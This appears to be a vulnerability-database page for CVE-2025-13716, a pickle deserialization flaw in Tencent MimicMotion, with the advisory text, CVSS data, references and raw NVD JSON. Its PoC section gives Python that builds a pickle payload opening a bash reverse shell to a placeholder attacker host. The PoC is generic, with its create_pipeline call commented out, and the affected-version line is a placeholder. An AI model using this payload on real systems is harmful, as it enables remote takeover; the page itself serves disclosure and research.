CVE-2025-13716

Description

Tencent MimicMotion create_pipeline Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MimicMotion. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the create_pipeline function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27208.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tencent MimicMotion < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import base64
import subprocess

# 恶意反序列化payload生成
class RCE:
    def __reduce__(self):
        # 执行任意命令，这里以反弹shell为例
        cmd = "/bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1"
        return (subprocess.Popen, (cmd,), {'shell': True})

# 生成恶意payload
malicious_data = pickle.dumps(RCE())
encoded_payload = base64.b64encode(malicious_data).decode()

# 模拟攻击：直接调用create_pipeline with malicious input
# create_pipeline(user_controlled_input=encoded_payload)

print(f"Malicious payload: {encoded_payload}")
print("Usage: Pass this payload to create_pipeline function")

# 实际利用场景：
# 1. Attacker crafts malicious serialized data
# 2. Victim visits malicious page or opens malicious file that triggers create_pipeline
# 3. The vulnerable create_pipeline function deserializes the malicious data
# 4. Arbitrary code execution occurs with root privileges

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13716
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13716
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13716/
[4] VulDB https://vuldb.com/cve/CVE-2025-13716
[5] https://github.com/Tencent/MimicMotion/commit/6907bdcc259a6a048d41a365e840d22274f9256c
[6] https://www.zerodayinitiative.com/advisories/ZDI-25-1032/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13716", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent MimicMotion create_pipeline Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MimicMotion. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the create_pipeline function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27208."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent/MimicMotion/commit/6907bdcc259a6a048d41a365e840d22274f9256c", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1032/", "source": "[email protected]"}]}}